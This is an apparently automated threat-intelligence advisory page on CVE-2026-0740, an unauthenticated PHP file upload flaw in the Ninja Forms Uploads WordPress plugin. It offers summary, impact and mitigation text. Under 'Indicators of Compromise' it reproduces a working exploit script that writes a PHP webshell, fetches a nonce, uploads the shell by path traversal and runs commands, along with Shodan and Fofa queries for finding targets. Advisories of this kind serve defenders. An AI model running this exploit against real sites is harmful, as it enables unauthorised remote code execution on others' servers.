Ninja Forms Uploads - Unauthenticated PHP File Upload
Ninja Forms Uploads version 3. 3. 24 contains an unauthenticated PHP file upload vulnerability (CVE-2026-0740) that allows attackers to upload a malicious PHP webshell without authentication. The exploit targets WordPress sites running Ninja Forms Uploads on Apache or Nginx servers. Exploit code is publicly available demonstrating how to obtain a nonce and upload a webshell, enabling remote command execution. No patch or official remediation guidance is provided in the available data. The severity is assessed as medium based on the ability to upload arbitrary PHP files unauthenticated but lacking evidence of widespread exploitation.
AI Analysis
Technical Summary
This vulnerability in Ninja Forms Uploads (version 3.3.24) allows unauthenticated attackers to upload arbitrary PHP files by abusing the file upload functionality. The exploit involves obtaining a nonce via an AJAX request and then uploading a PHP webshell disguised as an image file. Once uploaded, the attacker can execute system commands remotely through the webshell. The vulnerability is identified as CVE-2026-0740 and has publicly available exploit code written in PHP and shell script. The affected software is a WordPress plugin extension for file uploads. No patch or vendor advisory is currently referenced.
Potential Impact
Successful exploitation allows unauthenticated remote attackers to upload and execute arbitrary PHP code on the target server. This leads to remote code execution, potentially compromising the entire web server and underlying system. The exploit can be used to execute system commands, escalate privileges, or pivot within the network. However, there is no indication of active exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a fix is available, restrict access to the vulnerable plugin and consider disabling or removing the Ninja Forms Uploads extension. Monitor for suspicious file uploads and unauthorized access attempts. Applying web application firewall rules to block suspicious POST requests to admin-ajax.php may provide temporary mitigation.
Indicators of Compromise
- exploit-code: # Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload # Date: 2026-04-09 # Exploit Author: Sélim Lanouar (@whattheslime) # Vendor Homepage: https://ninjaforms.com/ # Software Link: https://ninjaforms.com/extensions/file-uploads/ # Version: 3.3.24 # Tested on: WordPress (6.9.3) on Apache and Nginx servers # CVE: CVE-2026-0740 # Fofa Query: body="nfpluginsettings.js?ver=" # Shodan Query: http.html:"nfpluginsettings.js?ver=" # ============================================================================= if [ "$#" -ne 1 ]; then echo "Usage: $0 <target_url>" exit 1 fi target=$1 field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo) file_name=webshell.php echo "[-] Writing webshell in /tmp/$file_name..." echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name echo "[-] Fetching nonce for random field_id $field_id..." nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \ -d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce') echo "[+] Got nf_fu_upload nonce: $nonce" echo "[-] Uploading webshell..." response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \ -F "action=nf_fu_upload" \ -F "nonce=$nonce" \ -F "form_id=$field_id" \ -F "field_id=$field_id" \ -F "image_jpg=../../../$file_name" \ -F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg") echo "[+] Upload response: $response" command="curl -ks '$target/wp-content/$file_name?cmd=id'" echo "[-] Executing the 'id' command via the uploaded webshell: $command" result=$(eval $command) echo "[+] Command output: $result"
Ninja Forms Uploads - Unauthenticated PHP File Upload
Description
Ninja Forms Uploads version 3. 3. 24 contains an unauthenticated PHP file upload vulnerability (CVE-2026-0740) that allows attackers to upload a malicious PHP webshell without authentication. The exploit targets WordPress sites running Ninja Forms Uploads on Apache or Nginx servers. Exploit code is publicly available demonstrating how to obtain a nonce and upload a webshell, enabling remote command execution. No patch or official remediation guidance is provided in the available data. The severity is assessed as medium based on the ability to upload arbitrary PHP files unauthenticated but lacking evidence of widespread exploitation.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This vulnerability in Ninja Forms Uploads (version 3.3.24) allows unauthenticated attackers to upload arbitrary PHP files by abusing the file upload functionality. The exploit involves obtaining a nonce via an AJAX request and then uploading a PHP webshell disguised as an image file. Once uploaded, the attacker can execute system commands remotely through the webshell. The vulnerability is identified as CVE-2026-0740 and has publicly available exploit code written in PHP and shell script. The affected software is a WordPress plugin extension for file uploads. No patch or vendor advisory is currently referenced.
Potential Impact
Successful exploitation allows unauthenticated remote attackers to upload and execute arbitrary PHP code on the target server. This leads to remote code execution, potentially compromising the entire web server and underlying system. The exploit can be used to execute system commands, escalate privileges, or pivot within the network. However, there is no indication of active exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a fix is available, restrict access to the vulnerable plugin and consider disabling or removing the Ninja Forms Uploads extension. Monitor for suspicious file uploads and unauthorized access attempts. Applying web application firewall rules to block suspicious POST requests to admin-ajax.php may provide temporary mitigation.
Technical Details
- Edb Id
- 52560
- Has Exploit Code
- true
- Code Language
- php
Indicators of Compromise
Exploit Source Code
Exploit code for Ninja Forms Uploads - Unauthenticated PHP File Upload
# Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload # Date: 2026-04-09 # Exploit Author: Sélim Lanouar (@whattheslime) # Vendor Homepage: https://ninjaforms.com/ # Software Link: https://ninjaforms.com/extensions/file-uploads/ # Version: 3.3.24 # Tested on: WordPress (6.9.3) on Apache and Nginx servers # CVE: CVE-2026-0740 # Fofa Query: body="nfpluginsettings.js?ver=" # Shodan Query: http.html:"nfpluginsettings.js?ver... (1169 more characters)
Threat ID: 6a0548c6cbff5d86105cd3a7
Added to database: 5/14/2026, 4:00:06 AM
Last enriched: 5/14/2026, 4:00:11 AM
Last updated: 5/14/2026, 6:27:36 AM
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.